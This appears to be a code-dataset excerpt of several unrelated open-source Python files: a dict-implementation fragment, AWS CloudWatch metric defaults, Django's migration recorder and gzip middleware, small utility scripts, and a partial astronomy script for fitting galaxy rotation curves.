# most 'num_extra'. The logic is based on:
# (d.resize_counter - 1) // 3 = room left in d
# so, if num_extra == 1, we need d.resize_counter > 3
# if num_extra == 2, we need d.resize_counter > 6 etc.
# Note however a further hack: if num_extra <= d.num_items,
# we avoid calling _ll_dict_resize_to here. This is to handle
# the case where dict.update() actually has a lot of collisions.
# If num_extra is much greater than d.num_items the conditional_call
# will trigger anyway, which is really the goal.
x = num_extra - d.num_items
jit.conditional_call(d.resize_counter <= x * 3,
_ll_dict_resize_to, d, num_extra)
# this is an implementation of keys(), values() and items()
# in a single function.
# note that by specialization on func, three different
# and very efficient functions are created.
def recast(P, v):
if isinstance(P, lltype.Ptr):
return lltype.cast_pointer(P, v)
else:
return v
def _make_ll_keys_values_items(kind):
def ll_kvi(LIST, dic):
res = LIST.ll_newlist(dic.num_items)
entries = dic.entries
dlen = len(entries)
items = res.ll_items()
i = 0
p = 0
while i < dlen:
if entries.valid(i):
ELEM = lltype.typeOf(items).TO.OF
if ELEM is not lltype.Void:
entry = entries[i]
if kind == 'items':
r = lltype.malloc(ELEM.TO)
r.item0 = recast(ELEM.TO.item0, entry.key)
r.item1 = recast(ELEM.TO.item1, entry.value)
items[p] = r
elif kind == 'keys':
items[p] = recast(ELEM, entry.key)
elif kind == 'values':
items[p] = recast(ELEM, entry.value)
p += 1
i += 1
assert p == res.ll_length()
return res
ll_kvi.oopspec = 'dict.%s(dic)' % kind
return ll_kvi
ll_dict_keys = _make_ll_keys_values_items('keys')
ll_dict_values = _make_ll_keys_values_items('values')
ll_dict_items = _make_ll_keys_values_items('items')
def ll_contains(d, key):
i = ll_dict_lookup(d, key, d.keyhash(key))
return not i & HIGHEST_BIT
POPITEMINDEX = lltype.Struct('PopItemIndex', ('nextindex', lltype.Signed))
global_popitem_index = lltype.malloc(POPITEMINDEX, zero=True, immortal=True)
def _ll_getnextitem(dic):
entries = dic.entries
ENTRY = lltype.typeOf(entries).TO.OF
dmask = len(entries) - 1
if hasattr(ENTRY, 'f_hash'):
if entries.valid(0):
return 0
base = entries[0].f_hash
else:
base = global_popitem_index.nextindex
counter = 0
while counter <= dmask:
i = (base + counter) & dmask
counter += 1
if entries.valid(i):
break
else:
raise KeyError
if hasattr(ENTRY, 'f_hash'):
entries[0].f_hash = base + counter
else:
global_popitem_index.nextindex = base + counter
return i
def ll_popitem(ELEM, dic):
i = _ll_getnextitem(dic)
entry = dic.entries[i]
r = lltype.malloc(ELEM.TO)
r.item0 = recast(ELEM.TO.item0, entry.key)
r.item1 = recast(ELEM.TO.item1, entry.value)
_ll_dict_del(dic, r_uint(i))
return r
def ll_pop(dic, key):
i = ll_dict_lookup(dic, key, dic.keyhash(key))
if not i & HIGHEST_BIT:
value = ll_get_value(dic, r_uint(i))
_ll_dict_del(dic, r_uint(i))
return value
else:
raise KeyError
def ll_pop_default(dic, key, dfl):
try:
return ll_pop(dic, key)
except KeyError:
return dfl
|
isandlaTech/cohorte-demos
|
refs/heads/dev
|
led/dump/led-demo-raspberry/cohorte/dist/cohorte-1.0.0-1.0.0-20141201.234602-19-python-distribution/repo/bundles/cohorte/composer/node/criteria/reliability/__init__.py
|
8
|
#!/usr/bin/env python
# -- Content-Encoding: UTF-8 --
"""
Cohorte Composer criteria components
:author: Thomas Calmant
:license: Apache Software License 2.0
..
Copyright 2014 isandlaTech
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Documentation strings format
__docformat__ = "restructuredtext en"
|
chenziliang/aws-meta-snaps
|
refs/heads/develop
|
snaps/cloudwatch_defaults.py
|
1
|
CLOUDWATCH_DEFAULT_METRICS = {
"AWS/AutoScaling": [
"GroupDesiredCapacity",
"GroupInServiceInstances",
"GroupMaxSize",
"GroupMinSize",
"GroupPendingInstances",
"GroupStandbyInstances",
"GroupTerminatingInstances",
"GroupTotalInstances"
],
"AWS/Billing": [
"EstimatedCharges"
],
"AWS/CloudFront": [
"4xxErrorRate",
"5xxErrorRate",
"BytesDownloaded",
"BytesUploaded",
"Requests",
"TotalErrorRate"
],
"AWS/CloudSearch": [
"IndexUtilization",
"Partitions",
"SearchableDocuments",
"SuccessfulRequests"
],
"AWS/DynamoDB": [
"ConditionalCheckFailedRequests",
"ConsumedReadCapacityUnits",
"ConsumedWriteCapacityUnits",
"OnlineIndexConsumedWriteCapacity",
"OnlineIndexPercentageProgress",
"OnlineIndexThrottleEvents",
"ProvisionedReadCapacityUnits",
"ProvisionedWriteCapacityUnits",
"ReadThrottleEvents",
"ReturnedBytes",
"ReturnedItemCount",
"ReturnedRecordsCount",
"SuccessfulRequestLatency",
"SystemErrors",
"ThrottledRequests",
"UserErrors",
"WriteThrottleEvents"
],
"AWS/EBS": [
"BurstBalance",
"VolumeConsumedReadWriteOps",
"VolumeIdleTime",
"VolumeQueueLength",
"VolumeReadBytes",
"VolumeReadOps",
"VolumeThroughputPercentage",
"VolumeTotalReadTime",
"VolumeTotalWriteTime",
"VolumeWriteBytes",
"VolumeWriteOps"
],
"AWS/EC2": [
"CPUCreditBalance",
"CPUCreditUsage",
"CPUUtilization",
"DiskReadBytes",
"DiskReadOps",
"DiskWriteBytes",
"DiskWriteOps",
"NetworkIn",
"NetworkOut",
"NetworkPacketsIn",
"NetworkPacketsOut",
"StatusCheckFailed",
"StatusCheckFailed_Instance",
"StatusCheckFailed_System"
],
"AWS/EC2Spot": [
"AvailableInstancePoolsCount",
"BidsSubmittedForCapacity",
"EligibleInstancePoolCount",
"FulfilledCapacity",
"MaxPercentCapacityAllocation",
"PendingCapacity",
"PercentCapacityAllocation",
"TargetCapacity",
"TerminatingCapacity"
],
"AWS/ECS": [
"CPUReservation",
"CPUUtilization",
"MemoryReservation",
"MemoryUtilization"
],
"AWS/ELB": [
"BackendConnectionErrors",
"HTTPCode_Backend_2XX",
"HTTPCode_Backend_3XX",
"HTTPCode_Backend_4XX",
"HTTPCode_Backend_5XX",
"HTTPCode_ELB_4XX",
"HTTPCode_ELB_5XX",
"HealthyHostCount",
"Latency",
"RequestCount",
"SpilloverCount",
"SurgeQueueLength",
"UnHealthyHostCount"
],
"AWS/ES": [
"AutomatedSnapshotFailure",
"CPUUtilization",
"ClusterStatus.green",
"ClusterStatus.red",
"ClusterStatus.yellow",
"DeletedDocuments",
"DiskQueueLength",
"FreeStorageSpace",
"JVMMemoryPressure",
"MasterCPUUtilization",
"MasterFreeStorageSpace",
"MasterJVMMemoryPressure",
"Nodes",
"ReadIOPS",
"ReadLatency",
"ReadThroughput",
"SearchableDocuments",
"WriteIOPS",
"WriteLatency",
"WriteThroughput"
],
"AWS/ElastiCache": [
"BytesReadIntoMemcached",
"BytesUsedForCache",
"BytesUsedForCacheItems",
"BytesUsedForHash",
"BytesWrittenOutFromMemcached",
"CPUUtilization",
"CacheHits",
"CacheMisses",
"CasBadval",
"CasHits",
"CasMisses",
"CmdConfigGet",
"CmdConfigSet",
"CmdFlush",
"CmdGet",
"CmdSet",
"CmdTouch",
"CurrConfig",
"CurrConnections",
"CurrItems",
"DecrHits",
"DecrMisses",
"DeleteHits",
"DeleteMisses",
"EvictedUnfetched",
"Evictions",
"ExpiredUnfetched",
"FreeableMemory",
"GetHits",
"GetMisses",
"GetTypeCmds",
"HashBasedCmds",
"HyperLogLogBasedCmds",
"IncrHits",
"IncrMisses",
"KeyBasedCmds",
"ListBasedCmds",
"NetworkBytesIn",
"NetworkBytesOut",
"NewConnections",
"NewItems",
"Reclaimed",
"ReplicationBytes",
"ReplicationLag",
"SaveInProgress",
"SetBasedCmds",
"SetTypeCmds",
"SlabsMoved",
"SortedSetBasedCmds",
"StringBasedCmds",
"SwapUsage",
"TouchHits",
"TouchMisses",
"UnusedMemory"
],
"AWS/ElasticMapReduce": [
"AppsCompleted",
"AppsFailed",
"AppsKilled",
"AppsPending",
"AppsRunning",
"AppsSubmitted",
"BackupFailed",
"CapacityRemainingGB",
"Cluster",
"ContainerAllocated",
"ContainerPending",
"ContainerReserved",
"CoreNodesPending",
"CoreNodesRunning",
"CorruptBlocks",
"DfsPendingReplicationBlocks",
"HBase",
"HDFSBytesRead",
"HDFSBytesWritten",
"HDFSUtilization",
"HbaseBackupFailed",
"IO",
"IsIdle",
"JobsFailed",
"JobsRunning",
"LiveDataNodes",
"LiveTaskTrackers",
"MRActiveNodes",
"MRDecommissionedNodes",
"MRLostNodes",
"MRRebootedNodes",
"MRTotalNodes",
"MRUnhealthyNodes",
"Map/Reduce",
"MapSlotsOpen",
"MapTasksRemaining",
"MapTasksRunning",
"MemoryAllocatedMB",
"MemoryAvailableMB",
"MemoryReservedMB",
"MemoryTotalMB",
"MissingBlocks",
"MostRecentBackupDuration",
"Node",
"PendingDeletionBlocks",
"ReduceSlotsOpen",
"ReduceTasksRemaining",
"ReduceTasksRunning",
"RemainingMapTasksPerSlot",
"S3BytesRead",
"S3BytesWritten",
"Status",
"TaskNodesPending",
"TaskNodesRunning",
"TimeSinceLastSuccessfulBackup",
"TotalLoad",
"UnderReplicatedBlocks"
],
"AWS/Events": [
"FailedInvocations",
"Invocations",
"MatchedEvents",
"ThrottledRules",
"TriggeredRules"
],
"AWS/Kinesis": [
"GetRecords.Bytes",
"GetRecords.IteratorAge",
"GetRecords.IteratorAgeMilliseconds",
"GetRecords.Latency",
"GetRecords.Success",
"IncomingBytes",
"IncomingRecords",
"PutRecord.Bytes",
"PutRecord.Latency",
"PutRecord.Success",
"PutRecords.Bytes",
"PutRecords.Latency",
"PutRecords.Records",
"PutRecords.Success"
],
"AWS/Lambda": [
"Duration",
"Errors",
"Invocations",
"Throttles"
],
"AWS/Logs": [
"DeliveryErrors",
"DeliveryThrottling",
"ForwardedBytes",
"ForwardedLogEvents",
"IncomingBytes",
"IncomingLogEvents"
],
"AWS/ML": [
"PredictCount",
"PredictFailureCount"
],
"AWS/OpsWorks": [
"cpu_idle",
"cpu_nice",
"cpu_system",
"cpu_user",
"cpu_waitio",
"load_1",
"load_15",
"load_5",
"memory_buffers",
"memory_cached",
"memory_free",
"memory_swap",
"memory_total",
"memory_used",
"procs"
],
"AWS/RDS": [
"BinLogDiskUsage",
"CPUCreditBalance",
"CPUCreditUsage",
"CPUUtilization",
"DatabaseConnections",
"DiskQueueDepth",
"FreeStorageSpace",
"FreeableMemory",
"NetworkReceiveThroughput",
"NetworkTransmitThroughput",
"ReadIOPS",
"ReadLatency",
"ReadThroughput",
"ReplicaLag",
"SwapUsage",
"WriteIOPS",
"WriteLatency",
"WriteThroughput"
],
"AWS/Redshift": [
"CPUUtilization",
"DatabaseConnections",
"HealthStatus",
"MaintenanceMode",
"NetworkReceiveThroughput",
"NetworkTransmitThroughput",
"PercentageDiskSpaceUsed",
"ReadIOPS",
"ReadLatency",
"ReadThroughput",
"WriteIOPS",
"WriteLatency",
"WriteThroughput"
],
"AWS/Route53": [
"ConnectionTime",
"HealthCheckPercentageHealthy",
"HealthCheckStatus",
"SSLHandshakeTime",
"TimeToFirstByte"
],
"AWS/S3": [
"BucketSizeBytes",
"NumberOfObjects"
],
"AWS/SNS": [
"NumberOfMessagesPublished",
"NumberOfNotificationsDelivered",
"NumberOfNotificationsFailed",
"PublishSize"
],
"AWS/SQS": [
"ApproximateNumberOfMessagesDelayed",
"ApproximateNumberOfMessagesNotVisible",
"ApproximateNumberOfMessagesVisible",
"NumberOfEmptyReceives",
"NumberOfMessagesDeleted",
"NumberOfMessagesReceived",
"NumberOfMessagesSent",
"SentMessageSize"
],
"AWS/SWF": [
"ActivityTaskScheduleToCloseTime",
"ActivityTaskScheduleToStartTime",
"ActivityTaskStartToCloseTime",
"ActivityTasksCanceled",
"ActivityTasksCompleted",
"ActivityTasksFailed",
"DecisionTaskScheduleToStartTime",
"DecisionTaskStartToCloseTime",
"DecisionTasksCompleted",
"ScheduledActivityTasksTimedOutOnClose",
"ScheduledActivityTasksTimedOutOnStart",
"StartedActivityTasksTimedOutOnClose",
"StartedActivityTasksTimedOutOnHeartbeat",
"StartedDecisionTasksTimedOutOnClose",
"WorkflowStartToCloseTime",
"WorkflowsCanceled",
"WorkflowsCompleted",
"WorkflowsContinuedAsNew",
"WorkflowsFailed",
"WorkflowsTerminated",
"WorkflowsTimedOut"
],
"AWS/StorageGateway": [
"CacheFree",
"CacheHitPercent",
"CachePercentDirty",
"CachePercentUsed",
"CacheUsed",
"CloudBytesDownloaded",
"CloudBytesUploaded",
"CloudDownloadLatency",
"QueuedWrites",
"ReadBytes",
"ReadTime",
"TimeSinceLastRecoveryPoint",
"TotalCacheSize",
"UploadBufferFree",
"UploadBufferPercentUsed",
"UploadBufferUsed",
"WorkingStorageFree",
"WorkingStoragePercentUsed",
"WorkingStorageUsed",
"WriteBytes",
"WriteTime"
],
"AWS/WAF": [
"AllowedRequests",
"BlockedRequests",
"CountedRequests"
],
"AWS/WorkSpaces": [
"Available",
"ConnectionAttempt",
"ConnectionFailure",
"ConnectionSuccess",
"InSessionLatency",
"Maintenance",
"SessionDisconnect",
"SessionLaunchTime",
"Unhealthy",
"UserConnected"
]
}
CLOUDWATCH_DEFAULT_DIMENSIONS = {
"AWS/AutoScaling": [
{
"AutoScalingGroupName": ".*"
}
],
"AWS/Billing": [
{
"Currency": ".*",
"LinkedAccount": ".*",
"ServiceName": ".*"
}
],
"AWS/CloudFront": [
{
"DistributionId": ".*",
"Region": ".*"
}
],
"AWS/CloudSearch": [
{
"ClientId": ".*",
"DomainName": ".*"
}
],
"AWS/DynamoDB": [
{
"GlobalSecondaryIndexName": ".*",
"Operation": ".*",
"StreamLabel": ".*",
"TableName": ".*"
}
],
"AWS/EBS": [
{
'VolumeId': '.*'
}
],
"AWS/EC2": [
{
"AutoScalingGroupName": ".*",
"ImageId": ".*",
"InstanceId": ".*",
"InstanceType": ".*"
}
],
"AWS/EC2Spot": [
{
"AvailabilityZone": ".*",
"FleetRequestId": ".*",
"InstanceType": ".*"
}
],
"AWS/ECS": [
{
"ClusterName": ".*",
"ServiceName": ".*"
}
],
"AWS/ELB": [
{
"AvailabilityZone": ".*",
"LoadBalancerName": ".*"
}
],
"AWS/ES": [
{
"ClientId": ".*",
"DomainName": ".*"
}
],
"AWS/ElastiCache": [
{
"CacheClusterId": ".*",
"CacheNodeId": ".*"
}
],
"AWS/ElasticMapReduce": [
{
"ClusterId/JobFlowId": ".*",
"JobId": ".*"
}
],
"AWS/Events": [
{
"RuleName": ".*"
}
],
"AWS/Kinesis": [
{
"StreamName": ".*"
}
],
"AWS/Lambda": [
{
"FunctionName": ".*",
"Resource": ".*"
}
],
"AWS/Logs": [
{
"DestinationType": ".*",
"FilterName": ".*",
"LogGroupName": ".*"
}
],
"AWS/ML": [
{
"MLModelId": ".*",
"RequestMode": ".*"
}
],
"AWS/OpsWorks": [
{
"InstanceId": ".*",
"LayerId": ".*",
"StackId": ".*"
}
],
"AWS/RDS": [
{
"DBClusterIdentifier": ".*",
"DBInstanceIdentifier": ".*",
"DatabaseClass": ".*",
"EngineName": ".*"
}
],
"AWS/Redshift": [
{
"ClusterIdentifier": ".*",
"NodeID": ".*"
}
],
"AWS/Route53": [
{
"HealthCheckId": ".*",
"Region": ".*"
}
],
"AWS/S3": [
{
"BucketName": ".*",
"StorageType": ".*"
}
],
"AWS/SNS": [
{
"Application": ".*",
"Platform": ".*",
"TopicName": ".*"
}
],
"AWS/SQS": [
{
"QueueName": ".*"
}
],
"AWS/SWF": [
{
"ActivityTypeName": ".*",
"ActivityTypeVersion": ".*",
"Domain": ".*",
"WorkflowTypeName": ".*",
"WorkflowTypeVersion": ".*"
}
],
"AWS/StorageGateway": [
{
"GatewayId": ".*",
"GatewayName": ".*",
"VolumeId": ".*"
}
],
"AWS/WAF": [
{
"Rule": ".*",
"WebACL": ".*"
}
],
"AWS/WorkSpaces": [
{
"DirectoryId": ".*",
"WorkspaceId": ".*"
}
]
}
|
wfxiang08/django197
|
refs/heads/master
|
django/db/migrations/recorder.py
|
478
|
from __future__ import unicode_literals
from django.apps.registry import Apps
from django.db import models
from django.db.utils import DatabaseError
from django.utils.encoding import python_2_unicode_compatible
from django.utils.timezone import now
from .exceptions import MigrationSchemaMissing
class MigrationRecorder(object):
"""
Deals with storing migration records in the database.
Because this table is actually itself used for dealing with model
creation, it's the one thing we can't do normally via migrations.
We manually handle table creation/schema updating (using schema backend)
and then have a floating model to do queries with.
If a migration is unapplied its row is removed from the table. Having
a row in the table always means a migration is applied.
"""
@python_2_unicode_compatible
class Migration(models.Model):
app = models.CharField(max_length=255)
name = models.CharField(max_length=255)
applied = models.DateTimeField(default=now)
class Meta:
apps = Apps()
app_label = "migrations"
db_table = "django_migrations"
def __str__(self):
return "Migration %s for %s" % (self.name, self.app)
def __init__(self, connection):
self.connection = connection
@property
def migration_qs(self):
return self.Migration.objects.using(self.connection.alias)
def ensure_schema(self):
"""
Ensures the table exists and has the correct schema.
"""
# If the table's there, that's fine - we've never changed its schema
# in the codebase.
if self.Migration._meta.db_table in self.connection.introspection.table_names(self.connection.cursor()):
return
# Make the table
try:
with self.connection.schema_editor() as editor:
editor.create_model(self.Migration)
except DatabaseError as exc:
raise MigrationSchemaMissing("Unable to create the django_migrations table (%s)" % exc)
def applied_migrations(self):
"""
Returns a set of (app, name) of applied migrations.
"""
self.ensure_schema()
return set(tuple(x) for x in self.migration_qs.values_list("app", "name"))
def record_applied(self, app, name):
"""
Records that a migration was applied.
"""
self.ensure_schema()
self.migration_qs.create(app=app, name=name)
def record_unapplied(self, app, name):
"""
Records that a migration was unapplied.
"""
self.ensure_schema()
self.migration_qs.filter(app=app, name=name).delete()
def flush(self):
"""
Deletes all migration records. Useful if you're testing migrations.
"""
self.migration_qs.all().delete()
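# Illustrative usage sketch (added for exposition, not part of the original module):
# callers hand the recorder a database connection and query or mutate migration
# state. The app label and migration name below are assumptions.
#
#     from django.db import connection
#     recorder = MigrationRecorder(connection)
#     recorder.applied_migrations()                     # set of (app_label, name)
#     recorder.record_applied('myapp', '0001_initial')
#     recorder.record_unapplied('myapp', '0001_initial')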
|
ProjectivePlane/hello-world
|
refs/heads/master
|
sumsquares.py
|
1
|
#!/usr/bin/python
import math
Max=10000
squareSet=set()
for n in xrange(1,int(math.sqrt(Max)+1)):
squareSet.add(n*n)
for m in xrange(1,Max+1):
for n in squareSet:
k=m-n
if k in squareSet and k<=n:
print m,"=",n,"+",k
|
nycholas/ask-undrgz
|
refs/heads/master
|
src/ask-undrgz/django/middleware/gzip.py
|
321
|
import re
from django.utils.text import compress_string
from django.utils.cache import patch_vary_headers
re_accepts_gzip = re.compile(r'\bgzip\b')
class GZipMiddleware(object):
"""
This middleware compresses content if the browser allows gzip compression.
It sets the Vary header accordingly, so that caches will base their storage
on the Accept-Encoding header.
"""
def process_response(self, request, response):
# It's not worth compressing non-OK or really short responses.
if response.status_code != 200 or len(response.content) < 200:
return response
patch_vary_headers(response, ('Accept-Encoding',))
# Avoid gzipping if we've already got a content-encoding.
if response.has_header('Content-Encoding'):
return response
# MSIE has issues with gzipped responses of various content types.
if "msie" in request.META.get('HTTP_USER_AGENT', '').lower():
ctype = response.get('Content-Type', '').lower()
if not ctype.startswith("text/") or "javascript" in ctype:
return response
ae = request.META.get('HTTP_ACCEPT_ENCODING', '')
if not re_accepts_gzip.search(ae):
return response
response.content = compress_string(response.content)
response['Content-Encoding'] = 'gzip'
response['Content-Length'] = str(len(response.content))
return response
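# Illustrative configuration sketch (added for exposition, not part of the original
# module): the middleware is enabled by listing it in the project settings, e.g.
#
#     MIDDLEWARE_CLASSES = (
#         'django.middleware.gzip.GZipMiddleware',
#         # ... other middleware ...
#     )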
|
jesuscript/topo-mpi
|
refs/heads/cleanmpi
|
topo/misc/pyxhandler.py
|
2
|
"""
Support for optional Cython .pyx files.
$Id$
"""
# CEBENHANCEMENT: If we begin using Cython components, consider adding
# more features of inlinec.py (ie: test of Cython compilation, control
# over warnings).
# CEBALERT: currently, need to do something like
# "export C_INCLUDE_PATH=lib/python2.6/site-packages/numpy/core/include/"
# for cython to find numpy headers. Might need to fix pyximport to look
# in the right place (it's possible to ask numpy for the location).
import __main__
import_pyx = __main__.__dict__.get('import_pyx',False)
pyximported = False
if import_pyx:
try:
import pyximport
pyximport.install()
pyximported = True
except:
pass
# JABALERT: As for the version in inlinec, I can't see any reason why
# this function accepts names rather than the more pythonic option of
# accepting objects, from which names can be extracted if necessary.
def provide_unoptimized_equivalent_cy(optimized_name, unoptimized_name, local_dict):
"""
Replace the optimized Cython component with its unoptimized
equivalent if pyximport is not available.
If import_pyx is True, warns about the unavailable component.
"""
if not pyximported:
local_dict[optimized_name] = local_dict[unoptimized_name]
if import_pyx:
print '%s: Cython components not available; using %s instead of %s.' \
% (local_dict['__name__'], unoptimized_name, optimized_name)
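# Usage sketch (everything except provide_unoptimized_equivalent_cy and
# pyximported is hypothetical): a consuming module defines a plain-Python
# fallback and lets this helper alias the optimized name to it whenever the
# Cython build is unavailable.
#
#     from topo.misc.pyxhandler import provide_unoptimized_equivalent_cy, pyximported
#
#     def compute(x):                              # pure-Python fallback
#         return x * x
#     if pyximported:
#         from fastmath_cy import compute_cy       # hypothetical .pyx module
#     provide_unoptimized_equivalent_cy('compute_cy', 'compute', locals())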
|
Amarchuk/2FInstability
|
refs/heads/master
|
core/n7217.py
|
1
|
__author__ = 'amarch'
# -*- coding: utf-8 -*-
import time
import shutil
from main import *
def correctGasData(r_g1, v_g1, dv_g1):
'''Function that gathers all the fitting operations applied to the gas data.'''
r_g = r_g1
v_g = v_g1
dv_g = dv_g1
# If the approximation needs to be straightened at the outer edge, a few of the last points
# can be duplicated - this should help smooth it. Alternatively, cut off at upperBord.
upperBord = 200
r_g, v_g, dv_g = zip(*(filter(lambda x: x[0] < upperBord, zip(r_g, v_g, dv_g))))
r_g = list(r_g)
v_g = list(v_g)
dv_g = list(dv_g)
# multiplate = 5
# addition_points = 2
# r_points = heapq.nlargest(addition_points, r_g)
# v_points = []
# dv_points = []
# for po in r_points:
# v_points.append(v_g[r_g.index(po)])
# dv_points.append(dv_g[r_g.index(po)])
# r_g = r_g + [i[0] + scale * i[1] for i in zip(r_points * multiplate, range(1, multiplate * addition_points + 1))]
# v_g = v_g + v_points * multiplate
# dv_g = dv_g + dv_points * multiplate
# NOTE: add_points / r_points / v_points / dv_points were left undefined in the
# original file; derive them here from the outermost measured point (the same
# idea as the commented-out block above) so the function can run. The value of
# add_points is an assumption.
add_points = 2
r_points = heapq.nlargest(1, r_g)
v_points = [v_g[r_g.index(r_points[0])]]
dv_points = [dv_g[r_g.index(r_points[0])]]
r_g = r_g + [i[0] + scale * i[1] for i in zip(r_points * add_points, range(1, add_points + 1))]
v_g = v_g + v_points * add_points
dv_g = dv_g + dv_points * add_points
return r_g, v_g, dv_g
def correctStarData(r_ma1, v_ma1, dv_ma1):
'''Corrections applied to the stellar data.'''
r_ma = r_ma1
v_ma = v_ma1
dv_ma = dv_ma1
# If the approximation needs to be straightened at the outer edge, a few of the last points
# can be duplicated - this should help smooth it. Alternatively, cut off at upperBord.
# upperBord = 3000
# r_ma, v_ma = zip(*(filter(lambda x: x[0] < upperBord, zip(r_ma, v_ma))))
# r_ma = list(r_ma)
# v_ma = list(v_ma)
#
# multiplate = 5
# addition_points = 3
# r_points = heapq.nlargest(addition_points, r_ma)
# v_points = []
# dv_points = []
# for po in r_points:
# v_points.append(v_ma[r_ma.index(po)])
# dv_points.append(dv_ma[r_ma.index(po)])
# r_ma = r_ma + [i[0] + scale * i[1] for i in zip(r_points * multiplate, range(1, multiplate * addition_points + 1))]
# v_ma = v_ma + v_points * multiplate
# dv_ma = dv_ma + dv_points * multiplate
add_points = 50
r_points = [75]
v_points = [221]
dv_points = [5]
r_ma = r_ma + [i[0] + scale * i[1] for i in zip(r_points * add_points, range(1, add_points + 1))]
v_ma = v_ma + v_points * add_points
dv_ma = dv_ma + dv_points * add_points
return r_ma, v_ma, dv_ma
def correctSigmaLosMaj(r_ma1, sig_los_ma1, dsig_los_ma1):
'''Correct the velocity dispersion data along the major axis.'''
# If the fit does not converge, adjust the initial guess for the Gaussian below:
x0 = array([0, 100, 5, 100])
# in case data from different sources end up in the same file
r_ma, sig_los_ma, dsig_los_ma = map(list, zip(*sorted(zip(r_ma1, sig_los_ma1, dsig_los_ma1))))
# The edges can be trimmed if they are poor
r_ma = r_ma[1:-1]
sig_los_ma = sig_los_ma[1:-1]
dsig_los_ma = dsig_los_ma[1:-1]
# # If the approximation needs to be straightened at the outer edge, a few of the last points
# # can be duplicated - this should help smooth it.
#
multiplate = 10
addition_points = 1
r_points = heapq.nlargest(addition_points, r_ma)
sig_points = []
dsig_points = []
for po in r_points:
sig_points.append(sig_los_ma[r_ma.index(po)])
dsig_points.append(dsig_los_ma[r_ma.index(po)])
r_ma = r_ma + [i[0] + scale * i[1] for i in
zip(r_points * multiplate, arange(1, 3 * (multiplate * addition_points) + 1, 3))]
sig_los_ma = sig_los_ma + sig_points * multiplate
dsig_los_ma = dsig_los_ma + dsig_points * multiplate
return r_ma, sig_los_ma, dsig_los_ma, x0
def correctSigmaLosMin(r_ma1, sig_los_ma1, dsig_los_ma1):
'''Correct the velocity dispersion data along the minor axis.'''
r_ma, sig_los_ma, dsig_los_ma = map(list, zip(*sorted(zip(r_ma1, sig_los_ma1, dsig_los_ma1))))
# The edges can be trimmed if they are poor
r_ma = r_ma[1:-1]
sig_los_ma = sig_los_ma[1:-1]
dsig_los_ma = dsig_los_ma[1:-1]
# If the fit does not converge, adjust the initial guess for the Gaussian below:
x0 = array([0, 10, 5, 10])
# If the approximation needs to be straightened at the outer edge, a few of the last points
# can be duplicated - this should help smooth it.
# multiplate = 10
# addition_points = 1
# r_points = heapq.nlargest(addition_points, r_ma)
# sig_points = []
# dsig_points = []
# for po in r_points:
# sig_points.append(sig_los_ma[r_ma.index(po)])
# dsig_points.append(dsig_los_ma[r_ma.index(po)])
# r_ma = r_ma + [i[0] + scale * i[1] for i in zip(r_points * multiplate, arange(1, 5*(multiplate * addition_points) + 1, 5))]
# sig_los_ma = sig_los_ma + sig_points * multiplate
# dsig_los_ma = dsig_los_ma + dsig_points * multiplate
return r_ma, sig_los_ma, dsig_los_ma, x0
startTime = time.time()
if __name__ == "__main__":
plt.rcParams.update({'font.size': 16})
path = '/home/amarch/Documents/RotationCurves/Diploma/TwoFluidInstAllDataFromSotn17Feb/Sample/RC/U11914_N7217'
name = 'U11914_N7217'
incl = 30 # according to Silchenko et al. 2011
scale = 1
resolution = 80 #pc/arcsec
h_disc = 36.8 # R-band
M_R = 10.38
M_B = 11.47
mu0_c_R = 19.91
r_eff_bulge = 26.2
pol_degree_star = 25
pol_degree_gas = 25
sig_pol_deg = 10
sig_pol_deg_mi = 12
Rmin = 20
Rmax = 115
M_to_L = 2.2
# Two discs and I-band data
mu_1_I = 17.4
h_1 = 12.5
mu_2_I = 18.3
h_2 = 35.8
gas_corr_by_incl = False
di = 5
monte_carlo_realizations = 2
peculiarities = [26, 35, 70, 80]
maxDisc = 10.0
sig_wings = r_eff_bulge # radius from which the dispersion wings are fitted
use_minor = False # whether the minor-axis dispersion is used
# Use the thick disc in the I band
h_disc = h_2
if not os.path.exists(path+'/EQUAL_IBAND/'):
os.makedirs(path+'/EQUAL_IBAND/')
else:
for f in os.listdir(path+'/EQUAL_IBAND/'):
os.remove(path+'/EQUAL_IBAND/'+f)
shutil.copy2(path+'/v_stars_ma.dat', path+'/EQUAL_IBAND/v_stars_ma.dat')
shutil.copy2(path+'/v_gas_ma.dat', path+'/EQUAL_IBAND/v_gas_ma.dat')
shutil.copy2(path+'/gas_density.dat', path+'/EQUAL_IBAND/gas_density.dat')
if os.path.exists(path+'/v_stars_mi.dat'):
shutil.copy2(path+'/v_stars_mi.dat', path+'/EQUAL_IBAND/v_stars_mi.dat')
# EQUAL and I-band
mainf(PATH=path+'/EQUAL_IBAND',
NAME=name,
INCL=incl,
SCALE=scale,
RESOLUTION=resolution,
H_DISC=h_disc,
MR=M_R,
MB=M_B,
MU0=mu_2_I,
R_EFF_B=r_eff_bulge,
DEG_STAR=pol_degree_star,
DEG_GAS=pol_degree_gas,
SIG_MA_DEG=sig_pol_deg,
SIG_MI_DEG=sig_pol_deg_mi,
RMIN=Rmin,
RMAX=Rmax,
GAS_CORR=gas_corr_by_incl,
M_TO_L=M_to_L,
DI=di,
MONTE_CARLO=monte_carlo_realizations,
CORRECTION_GAS=correctGasData,
CORRECTION_STAR=correctStarData,
CORRECTION_SIG_MA=correctSigmaLosMaj,
CORRECTION_SIG_MI=correctSigmaLosMin,
SURF_DENS_STAR=surfaceDensityStarForTwoDiscs,
METHOD='EQUAL',
PECULIARITIES=peculiarities,
H_DISC_2=h_1,
MU0_2=mu_1_I,
SIG_WINGS = sig_wings, USE_MINOR = use_minor, RUN=1)
renameFilesByMethod(path+'/EQUAL_IBAND/', 'EQUAL_IBAND')
if not os.path.exists(path+'/HALF_MAX/'):
os.makedirs(path+'/HALF_MAX/')
else:
for f in os.listdir(path+'/HALF_MAX/'):
os.remove(path+'/HALF_MAX/'+f)
shutil.copy2(path+'/v_stars_ma.dat', path+'/HALF_MAX/v_stars_ma.dat')
shutil.copy2(path+'/v_gas_ma.dat', path+'/HALF_MAX/v_gas_ma.dat')
shutil.copy2(path+'/gas_density.dat', path+'/HALF_MAX/gas_density.dat')
if os.path.exists(path+'/v_stars_mi.dat'):
shutil.copy2(path+'/v_stars_mi.dat', path+'/HALF_MAX/v_stars_mi.dat')
# HALF and maximum disc
